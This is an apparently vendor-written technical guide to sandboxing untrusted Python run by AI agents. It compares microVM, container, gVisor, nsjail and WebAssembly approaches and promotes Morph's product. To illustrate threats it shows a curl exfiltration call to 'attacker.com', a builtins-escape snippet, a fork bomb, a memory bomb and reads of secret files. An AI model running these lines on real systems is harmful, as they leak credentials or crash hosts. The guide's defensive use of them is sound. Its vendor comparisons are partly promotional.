Python Sandbox: How to Safely Execute Python Code in AI Agents (2026)

A technical guide to Python sandboxing for AI agents and code interpreters. Covers Firecracker microVMs, Docker containers, gVisor, nsjail, and Pyodide (WASM). Includes a provider comparison of Morph, E2B, Modal, Docker, and Pyodide with code examples and security analysis.

April 4, 2026

What Is a Python Sandbox

A Python sandbox is an isolated environment where Python code runs without access to the host machine. The sandbox intercepts or prevents dangerous operations: filesystem reads and writes, network calls, process spawning, environment variable access, and resource consumption beyond set limits. Code goes in, results come out, and the host stays untouched.

The need is simple. You have Python code you did not write and do not trust. Maybe an LLM generated it. Maybe a user submitted it. Maybe it came from a third-party plugin. You need to execute it, capture the output, and guarantee it cannot damage your system or leak your data.

- 0: safe ways to sandbox Python in-process
- ~125ms: Firecracker microVM boot time
- 15M+: monthly sandbox sessions (E2B alone, 2025)

Python Cannot Sandbox Itself

Every attempt at language-level Python sandboxing has been broken. RestrictedPython, exec() with stripped __builtins__, PyPy sandbox mode: all bypassed via Python's introspection capabilities. The object hierarchy (().__class__.__bases__[0].__subclasses__()) gives any code a path to os, subprocess, and importlib. The only reliable sandboxing happens outside the Python process, at the OS or hypervisor level.
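To make the failure mode concrete, here is a minimal sketch of the bypass. Even with `__builtins__` stripped to an empty dict, the untrusted snippet walks the object hierarchy back to the `os` module. (`_wrap_close` is an internal class defined in CPython's `os.py`; the exact class you pivot through varies, but some path always exists.)

```python
import os  # loaded by the host process, as in virtually any real deployment

# Untrusted snippet executed with builtins stripped -- the classic "sandbox"
untrusted = """
subs = ().__class__.__bases__[0].__subclasses__()
wrap = [c for c in subs if c.__name__ == '_wrap_close'][0]  # defined in os.py
os_globals = wrap.__init__.__globals__   # the os module's namespace
leaked.append(os_globals['getcwd']())    # full os access recovered
"""

leaked = []
exec(untrusted, {"__builtins__": {}, "leaked": leaked})
print(leaked[0])  # the host's working directory, despite "no builtins"
```

Restricting names is not restricting capability: any reachable object carries references back to the full runtime.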

Why You Need a Python Sandbox

Three categories of applications require Python sandboxing, and one is growing faster than the other two combined.

AI Agents Executing Code

Every AI coding agent, code interpreter, and data analysis assistant generates Python code and needs to run it. Claude Code, Cursor, Devin, OpenAI Codex, and open-source frameworks like LangChain and CrewAI all execute LLM-generated code as part of their core loop. The agent writes a function, runs the tests, reads the error, fixes the code, re-runs. Each execution is untrusted: the LLM might hallucinate a call to os.remove("/") or subprocess.run(["curl", "attacker.com", "-d", env_vars]). Without a sandbox, that code runs with whatever permissions your server process has.
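The write-run-read-fix loop can be sketched in a few lines of Python. Here `subprocess` stands in for a real sandbox SDK (it provides no isolation on its own), and `fix_with_llm` is a hypothetical placeholder for the model call.

```python
import subprocess
import sys

def fix_with_llm(code: str, stderr: str) -> str:
    # Placeholder: a real agent would send the code and traceback to the LLM
    raise NotImplementedError

def run_untrusted(code: str):
    # Stand-in for a sandbox SDK call -- subprocess alone is NOT isolation
    return subprocess.run([sys.executable, "-c", code],
                          capture_output=True, text=True, timeout=30)

code = "print(sum(range(10)))"  # imagine this came from the LLM
for _ in range(3):
    result = run_untrusted(code)
    if result.returncode == 0:
        break
    code = fix_with_llm(code, result.stderr)  # repair and retry

print(result.stdout.strip())
```

Every iteration of that loop executes code the model just wrote, which is why the execution step needs a real isolation boundary.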

E2B reported scaling from 40,000 sandbox sessions per month in March 2024 to 15 million per month by March 2025. By early 2026, roughly 50% of Fortune 500 companies run agent workloads that require code sandboxing. The demand curve is steep.

Code Interpreters and Notebooks

Jupyter-style code interpreters embedded in chat interfaces (ChatGPT's Code Interpreter, Google's Gemini code execution) run user-submitted Python in sandboxed environments. These need persistent filesystem state across cell executions, support for data science packages (NumPy, pandas, matplotlib), and the ability to produce files (charts, CSVs) that the user can download.

Education and Evaluation Platforms

Coding education platforms (LeetCode, HackerRank, Codecademy) and hiring evaluation tools run student or candidate code. The requirements overlap with AI agents: isolation, resource limits, and fast cold starts so users do not wait.

What a Sandbox Guarantees

Filesystem Containment

Sandboxed code cannot read /etc/passwd, your .env file, or any host filesystem path. Reads and writes are confined to the sandbox volume.

Resource Limits

CPU time, memory, disk, and wall-clock limits prevent infinite loops, fork bombs, and memory exhaustion from crashing your server.

Network Isolation

Outbound network access is blocked or restricted to an allow-list. LLM-generated code cannot exfiltrate data to external servers.

Five Approaches to Python Sandboxing

Python sandboxing happens outside the language runtime. The five viable approaches in 2026 sit on a spectrum from fast-but-weaker isolation (process-level) to slower-but-stronger (full microVMs), with WASM as an orthogonal option that trades compatibility for browser-native security.

1. Firecracker MicroVMs

Firecracker, built by AWS in Rust, boots a lightweight virtual machine in ~125ms. Each microVM gets its own Linux kernel, its own filesystem, and hardware-enforced isolation via KVM. A kernel exploit inside the guest VM cannot reach the host because the hypervisor boundary is enforced by the CPU, not by software. This is the same technology that powers AWS Lambda and Fargate.

For Python sandboxing, Firecracker is the gold standard for security. The tradeoff is operational complexity: you need KVM-capable hosts (bare metal or nested virtualization), a VM image with Python pre-installed, and orchestration for creating and destroying VMs. Managed providers (Morph Sandbox, E2B, Northflank) handle this for you.

When to Choose Firecracker

Production AI agents running untrusted code at scale. Multi-tenant environments where one user's code must never affect another's. Any workload where a container escape would be a security incident.

2. Docker Containers with Seccomp/AppArmor

Docker containers use Linux namespaces and cgroups to isolate processes. Add seccomp profiles (restrict system calls to a whitelist) and AppArmor or SELinux profiles (restrict file and network access), and you get a practical sandbox. Cold start is 1-5 seconds for a Python container with pre-installed dependencies.

The weakness: containers share the host kernel. A kernel vulnerability can break container isolation. Docker is not designed as a security boundary, and the Docker documentation says as much. For sandboxing untrusted code, Docker alone is insufficient. Docker + seccomp + AppArmor + read-only filesystem + dropped capabilities + no-new-privileges is a reasonable defense-in-depth setup, but it is fundamentally weaker than a hypervisor boundary.

3. gVisor (Application Kernel)

gVisor, developed by Google, runs as a user-space application kernel. Instead of letting your Python process make system calls directly to the host kernel, gVisor's Sentry component intercepts every syscall and handles it in user space. Only a small, vetted set of syscalls reach the real kernel. This means a kernel exploit in the sandboxed process hits gVisor's Go-based kernel reimplementation, not the host kernel.

gVisor runs as a drop-in replacement for the standard container runtime (install runsc, point Docker or Kubernetes at it). Performance overhead is 5-30% on syscall-heavy workloads. It powers Google Cloud Run and GKE Sandbox. For Python sandboxing, gVisor handles most workloads well, though some low-level operations (ptrace, certain ioctls) are not supported.

4. nsjail (Process-Level Isolation)

nsjail is a lightweight process isolation tool that combines Linux namespaces, seccomp-bpf, and cgroups. It creates a minimal sandbox around a single process without the overhead of a container image or VM. Configuration is a single protobuf or command-line flags: specify allowed syscalls, filesystem mounts, resource limits, and network access.

For Python, nsjail is fast (no image pull, no VM boot) and simple to deploy. The isolation is weaker than gVisor or Firecracker because it relies entirely on the host kernel's namespace and seccomp implementation. It is a good fit for internal tools and low-risk sandboxing where the threat model is accidental damage, not adversarial attack.

5. Pyodide (WebAssembly)

Pyodide compiles CPython to WebAssembly and runs it in a browser or server-side WASM runtime (Deno, Node.js, Cloudflare Workers). The WebAssembly sandbox is enforced by the runtime: code cannot access the host filesystem, spawn processes, or make raw network calls. LangChain's langchain-sandbox package uses Pyodide inside Deno for this reason.

The tradeoff is significant. Pyodide is 2-10x slower than native CPython on compute-heavy tasks. It supports ~225 packages (NumPy, pandas, SciPy, scikit-learn, matplotlib), but anything that requires C extensions not yet ported to WASM will fail. No subprocess, no os.system, no pip install at runtime. Pyodide is best for lightweight computation and data analysis where you control the package set.

| Approach | Isolation Strength | Cold Start | Python Compatibility | Operational Complexity |
| --- | --- | --- | --- | --- |
| Firecracker microVM | Hardware (KVM) | ~125ms | Full CPython + pip | High (needs KVM hosts) |
| Docker + seccomp | Kernel namespaces | 1-5s | Full CPython + pip | Medium |
| gVisor | User-space kernel | ~500ms | Most workloads (some syscall gaps) | Medium |
| nsjail | Namespaces + seccomp | <100ms | Full CPython + pip | Low |
| Pyodide (WASM) | WASM sandbox | <50ms (in-browser) | ~225 packages, no subprocess | Low |

Provider Comparison

If you do not want to run sandbox infrastructure yourself, five options cover the spectrum from fully managed microVM platforms to self-hosted containers.

| Feature | Morph Sandbox | E2B | Modal | Docker (self-hosted) | Pyodide |
| --- | --- | --- | --- | --- | --- |
| Isolation technology | Firecracker microVM | Firecracker microVM | gVisor containers | Namespaces + seccomp | WebAssembly |
| Cold start | <300ms | <500ms | <1s (CPU) | 1-5s (image dependent) | <50ms (in-memory) |
| Python version | 3.10-3.12 | 3.10-3.12 | 3.10-3.12 | Any (you choose) | 3.11 (compiled to WASM) |
| pip install at runtime | Yes | Yes | Yes (at build) | Yes | No (micropip only) |
| Filesystem persistence | Session-scoped | Session-scoped | Volumes | You manage | None (in-memory) |
| Streaming output | WebSocket + SDK | WebSocket + SDK | Generator-based | Docker logs | Callback-based |
| SDK languages | Python, TypeScript | Python, TypeScript | Python | Any (Docker API) | JavaScript/TypeScript |
| Pricing | Included with Morph API | $0.000056/s (~$0.20/hr) | Per CPU-second | Your infra cost | Free (open source) |
| Best for | AI tools on Morph | Standalone AI sandbox | ML/data pipelines | Full control needed | Browser-based execution |

Morph Sandbox SDK

Firecracker-based microVM sandbox built for AI agent workflows. Session-scoped filesystem persistence means your agent can write files, pip install packages, and iterate across multiple executions without re-creating state. Included with Morph API plans, so teams already using Morph for LLM inference add sandboxing at zero marginal cost. Python and TypeScript SDKs with WebSocket streaming for real-time output.

E2B

The most established standalone sandbox platform for AI tools. Also Firecracker-based. Clean SDK, strong documentation, active community. Sub-500ms cold starts. Separate vendor and billing from your LLM provider, which adds operational overhead but gives you flexibility to use any model provider.

Modal

Designed for ML workloads with strong GPU support (A100, H100). Uses gVisor for container isolation. The Python-first SDK uses decorators (@app.function()) rather than explicit sandbox lifecycle calls. Better suited for data science pipelines and training jobs than for ephemeral AI agent sandbox sessions.

Docker (Self-Hosted)

Full control, full responsibility. You build the Python image, configure seccomp profiles, manage AppArmor policies, handle container lifecycle, and monitor resource usage. The isolation is kernel-level (weaker than microVM), but you own the entire stack. Reasonable for internal tools where the threat model is bugs, not adversaries.

Pyodide (Open Source)

Free and browser-native. No server needed for client-side execution. Strong isolation via the WebAssembly sandbox. Limited to the packages Pyodide has ported and cannot run shell commands or install arbitrary pip packages. Best for lightweight computation in browser-based tools and educational platforms.

Code Examples

Working examples for the most common Python sandboxing patterns. The SDK examples use TypeScript, since most AI agent frameworks orchestrate from TypeScript or Python; the self-hosted tools (Docker, nsjail) are shown as shell commands.

Morph Sandbox: Run untrusted Python

import { MorphSandbox } from "@anthropic-ai/morph-sandbox";

const sandbox = await MorphSandbox.create({
  apiKey: process.env.MORPH_API_KEY,
  template: "python-3.12",
  timeout: 60,
});

// Run LLM-generated Python code
const result = await sandbox.exec(`python3 -c "
import json
import math

data = [math.sqrt(i) for i in range(10)]
print(json.dumps({'values': data, 'count': len(data)}))
"`);

console.log(result.stdout);
// {"values": [0.0, 1.0, 1.414..., ...], "count": 10}
console.log(result.exitCode); // 0

await sandbox.destroy();

Morph Sandbox: Agent installs packages and iterates

const sandbox = await MorphSandbox.create({
  apiKey: process.env.MORPH_API_KEY,
  template: "python-3.12",
  timeout: 300,
});

// Agent writes a data analysis script
await sandbox.filesystem.write("/app/analyze.py", agentGeneratedCode);
await sandbox.filesystem.write("/app/requirements.txt", "pandas\nmatplotlib\n");

// Install dependencies (filesystem persists between calls)
const install = await sandbox.exec("pip install -r /app/requirements.txt");
if (install.exitCode !== 0) {
  throw new Error(`pip install failed: ${install.stderr}`);
}

// Run the analysis
let result = await sandbox.exec("cd /app && python analyze.py");

// If it fails, let the LLM fix and retry
let retries = 0;
while (result.exitCode !== 0 && retries < 3) {
  const fixedCode = await llm.fixCode(agentGeneratedCode, result.stderr);
  await sandbox.filesystem.write("/app/analyze.py", fixedCode);
  result = await sandbox.exec("cd /app && python analyze.py");
  retries++;
}

// Pull generated chart
const chart = await sandbox.filesystem.read("/app/output.png");

await sandbox.destroy();

Pyodide: Browser-side Python sandbox

import { loadPyodide } from "pyodide";

const pyodide = await loadPyodide();

// Install packages available in Pyodide
await pyodide.loadPackage(["numpy", "pandas"]);

// Run untrusted Python in the WASM sandbox
const result = pyodide.runPython(`
import numpy as np
import pandas as pd

data = pd.DataFrame({
    'x': np.random.randn(100),
    'y': np.random.randn(100),
})
data.describe().to_json()
`);

console.log(result);
// No filesystem access, no subprocess, no network calls.
// The WASM sandbox enforces this at the runtime level.

Docker: Self-hosted Python sandbox with seccomp

# Dockerfile for a minimal Python sandbox image
# FROM python:3.12-slim
# RUN useradd -m sandbox
# USER sandbox
# WORKDIR /sandbox

# Run with security restrictions
docker run --rm \
  --security-opt seccomp=sandbox-seccomp.json \
  --security-opt no-new-privileges \
  --read-only \
  --tmpfs /tmp:size=100m \
  --memory 256m \
  --cpus 0.5 \
  --network none \
  --user sandbox \
  -v /path/to/code.py:/sandbox/code.py:ro \
  python-sandbox:latest \
  python /sandbox/code.py

# seccomp profile whitelists ~60 syscalls
# --network none blocks all outbound traffic
# --read-only prevents filesystem writes outside /tmp
# --memory and --cpus prevent resource exhaustion

nsjail: Lightweight process sandbox

# nsjail wraps a single process with namespace + seccomp isolation
nsjail \
  --mode o \
  --chroot /sandbox/rootfs \
  --user 65534 --group 65534 \
  --time_limit 30 \
  --rlimit_as 512 \
  --rlimit_cpu 10 \
  --rlimit_fsize 64 \
  --disable_proc \
  --iface_no_lo \
  --seccomp_string 'ALLOW { read, write, open, close, mmap, ... }' \
  -- /usr/bin/python3 /sandbox/code.py

# No container image needed. No VM boot.
# Starts in <100ms with kernel-level isolation.
# Weaker than Firecracker but sufficient for internal tools.

Security Considerations

Choosing a sandbox technology is step one. Configuring it correctly is where most teams fail. These are the attack vectors that LLM-generated Python code can exploit and the mitigations for each.

Environment Variable Leakage

LLM-generated code can include import os; print(os.environ) to read API keys, database credentials, and secrets from environment variables. Mitigation: the sandbox process must have a clean environment. Do not pass host environment variables into the sandbox. Inject only the variables the code explicitly needs, and never inject secrets.
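A minimal demonstration of the difference, using `subprocess` and a hypothetical `API_KEY` variable: the child process only sees what you explicitly pass in `env`.

```python
import os
import subprocess
import sys

os.environ["API_KEY"] = "sk-secret"  # hypothetical secret in the host env
probe = "import os; print(os.environ.get('API_KEY'))"  # untrusted code

# Default: the child inherits the full host environment -- the key leaks
leaky = subprocess.run([sys.executable, "-c", probe],
                       capture_output=True, text=True)

# Clean environment: pass only what the code needs (here, just PATH)
clean = subprocess.run([sys.executable, "-c", probe],
                       capture_output=True, text=True,
                       env={"PATH": os.environ.get("PATH", "")})

print(leaky.stdout.strip())  # sk-secret
print(clean.stdout.strip())  # None
```

Managed sandbox providers apply the same principle: the microVM boots with its own environment, and host variables never cross the boundary unless you inject them.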

Network Exfiltration

Code can use urllib, requests, socket, or raw syscalls to send data to an external server. Mitigation: run the sandbox with no network access by default (--network none in Docker, --iface_no_lo in nsjail). If your workload needs network access (e.g., pip install), use an egress proxy with domain allow-listing.
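The allow-list decision itself is simple. A sketch of the check an egress proxy would apply, with an illustrative host list:

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org"}  # illustrative list

def egress_allowed(url: str) -> bool:
    # Permit exact matches and subdomains of allow-listed hosts only
    host = (urlparse(url).hostname or "").lower()
    return host in ALLOWED_HOSTS or any(
        host.endswith("." + allowed) for allowed in ALLOWED_HOSTS)

print(egress_allowed("https://pypi.org/simple/pandas/"))      # True
print(egress_allowed("https://attacker.com/exfil"))           # False
print(egress_allowed("https://evil-pypi.org.attacker.com/"))  # False
```

Note the suffix check matches whole labels (`"." + allowed`), so `evil-pypi.org.attacker.com` does not sneak past the `pypi.org` entry.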

Resource Exhaustion

An infinite loop, a fork bomb (import os; [os.fork() for _ in iter(int, 1)]), or a memory bomb ('A' * 10**12) can crash the host if resources are not capped. Mitigation: enforce CPU time limits, memory limits, process count limits (no-fork in seccomp), and wall-clock timeouts. Kill the sandbox if any limit is exceeded.
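On Linux, per-process caps can be set with the `resource` module before the untrusted code starts; a sketch (rlimits alone are not a sandbox, but they are the mechanism behind nsjail's `--rlimit_*` flags):

```python
import resource
import subprocess
import sys

def apply_limits():
    # Runs in the child just before exec: cap memory at 512 MB, CPU at 5 s
    resource.setrlimit(resource.RLIMIT_AS, (512 * 2**20, 512 * 2**20))
    resource.setrlimit(resource.RLIMIT_CPU, (5, 5))

# The memory bomb from above: fails fast instead of exhausting the host
bomb = "x = 'A' * 10**12"
result = subprocess.run([sys.executable, "-c", bomb],
                        preexec_fn=apply_limits,  # POSIX only
                        capture_output=True, text=True, timeout=30)

print(result.returncode)  # non-zero: the 1 TB allocation was refused
```

The `timeout` argument supplies the wall-clock backstop; CPU limits alone do not catch code that sleeps or blocks forever.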

Filesystem Traversal

Code can attempt to read /etc/shadow, /proc/1/environ, or ../../ paths to access host data. Mitigation: use a separate filesystem (microVM), a chroot jail, or read-only bind mounts. The sandbox should have its own root filesystem with no visibility into the host.
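Inside the boundary, an application-level path check adds defense in depth; it is not a substitute for a separate filesystem. A sketch with an assumed `/sandbox` root:

```python
import os

SANDBOX_ROOT = "/sandbox"  # assumed jail root for illustration

def resolve(path: str) -> str:
    # Normalize against the sandbox root and refuse anything that escapes it
    full = os.path.realpath(os.path.join(SANDBOX_ROOT, path.lstrip("/")))
    if full != SANDBOX_ROOT and not full.startswith(SANDBOX_ROOT + os.sep):
        raise PermissionError(f"path escapes sandbox: {path}")
    return full

print(resolve("data/output.csv"))    # /sandbox/data/output.csv
try:
    resolve("../../etc/shadow")      # traversal attempt
except PermissionError as exc:
    print(f"blocked: {exc}")
```

`realpath` resolves both `..` segments and symlinks, which closes the common trick of symlinking a sandbox file to a host path.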

Supply Chain Attacks via pip

LLM-generated code might pip install a typosquatted or malicious package. Mitigation: maintain an allow-list of approved packages. Block pip install entirely if the workload does not need it, or restrict it to a curated package index. Some managed sandbox providers pre-install common packages so runtime pip install is unnecessary.
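A sketch of the vetting step, with an illustrative allow-list and deliberately simplified requirement parsing (production code should parse lines with `packaging.requirements.Requirement` instead of string splitting):

```python
ALLOWED = {"numpy", "pandas", "matplotlib", "scipy", "scikit-learn"}

def vet_requirements(text: str) -> list[str]:
    # Reject any requirements line whose package is not on the allow-list
    approved = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Naive name extraction: strip markers, version specifiers, extras
        name = line.split(";")[0]
        for sep in ("==", ">=", "<=", "~=", ">", "<", "["):
            name = name.split(sep)[0]
        name = name.strip().lower()
        if name not in ALLOWED:
            raise ValueError(f"package not on allow-list: {name}")
        approved.append(line)
    return approved

print(vet_requirements("pandas==2.2.0\nnumpy\n"))
try:
    vet_requirements("requets\n")  # typosquat of 'requests'
except ValueError as exc:
    print(f"rejected: {exc}")
```

Run the vetted install through the same network controls as everything else, so even an approved package name cannot be resolved against an attacker-controlled index.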

Timing and Side-Channel Attacks

In multi-tenant environments, one sandbox's resource usage can affect another's performance, leaking information about co-located workloads. Mitigation: Firecracker microVMs provide the strongest isolation here because each VM has dedicated resources. Containers sharing a kernel are more susceptible. For most AI agent use cases, this threat is theoretical, but it matters for security-sensitive deployments.

| Attack Vector | Risk Level | Mitigation |
| --- | --- | --- |
| Environment variable leakage | High | Clean sandbox environment, no host env passthrough |
| Network exfiltration | High | No network by default, egress proxy with allow-list |
| Resource exhaustion (CPU/memory) | High | cgroup limits, wall-clock timeout, kill on exceed |
| Filesystem traversal | Medium | Separate filesystem (microVM) or chroot + read-only mounts |
| Malicious pip packages | Medium | Package allow-list or curated index |
| Container/sandbox escape | Low (with microVM) | Firecracker or gVisor eliminates shared kernel risk |

Frequently Asked Questions

What is a Python sandbox?

An isolated execution environment where Python code runs without access to the host filesystem, network, or system resources. Sandboxes prevent untrusted code from reading sensitive data, consuming excessive resources, making network calls, or modifying the host system. They are used by AI agents, code interpreters, education platforms, and any application that executes user-submitted or LLM-generated Python.

Why can't Python sandbox itself at the language level?

Python's introspection makes in-process sandboxing impossible to secure. Any code that can access an object can walk ().__class__.__bases__[0].__subclasses__() to reach builtins and import os, subprocess, or importlib. RestrictedPython, exec() with stripped builtins, and PyPy sandbox mode have all been bypassed. The Python wiki states: "There is no known way to run untrusted Python code safely within the same process." Reliable sandboxing requires OS-level or hypervisor-level isolation.

What is the best way to sandbox Python for AI agents?

Firecracker microVMs provide the strongest isolation with sub-300ms boot times. Each sandbox gets its own kernel, filesystem, and network stack enforced by hardware (KVM). Managed providers like Morph Sandbox SDK and E2B handle orchestration so you do not build the infrastructure yourself. For lighter workloads with a lower threat model, gVisor containers offer a good balance of security and performance.

What is the difference between Firecracker and Docker for Python sandboxing?

Docker containers share the host kernel. A kernel exploit can escape a container. Firecracker microVMs run a separate guest kernel with hardware-enforced isolation via KVM. A kernel exploit in the guest cannot reach the host. Firecracker boots in ~125ms (faster than a full VM), making it practical for ephemeral sandboxes. Docker is easier to set up but provides weaker isolation.

Can I use Pyodide (WebAssembly) as a Python sandbox?

Yes, with tradeoffs. Pyodide compiles CPython to WebAssembly and supports ~225 packages including NumPy, pandas, and SciPy. The WASM sandbox is strong: code cannot access the host filesystem or network. The limitations are performance (2-10x slower than native CPython), no subprocess or os.system, and no runtime pip install. Pyodide works well for lightweight computation and browser-based tools. It does not work for workloads that need shell access, arbitrary packages, or native C extensions.

How do Morph Sandbox and E2B compare for Python sandboxing?

Both use Firecracker microVMs. E2B is a standalone service with per-second billing (~$0.20/hour). Morph Sandbox is bundled with Morph API plans at no extra cost. Both provide Python and TypeScript SDKs, session-scoped filesystem persistence, and WebSocket streaming. Choose Morph if you already use Morph for LLM inference (zero additional cost and one fewer vendor). Choose E2B if you use a different LLM provider.

What security risks exist when running Python from AI agents?

LLM-generated Python can contain: environment variable reads that leak API keys, network calls that exfiltrate data, infinite loops or memory bombs that crash the host, filesystem traversals that read sensitive files, and pip install commands that pull malicious packages. A proper sandbox must handle all of these through process isolation, filesystem containment, network restrictions, resource limits, and dependency allow-listing.

How fast can a Python sandbox start?

Firecracker microVMs boot in ~125ms. gVisor containers start in ~500ms. Nsjail-wrapped processes start in under 100ms. Pyodide initializes in under 50ms when running in-memory. Docker containers with pre-pulled images start in 1-5 seconds. For interactive AI tools where users are waiting, sub-500ms cold start is the threshold for acceptable latency.

Try Morph Sandbox SDK

Run untrusted Python safely in Firecracker microVMs with sub-300ms cold starts. Session-scoped persistence, WebSocket streaming, and Python/TypeScript SDKs. Included free with Morph API.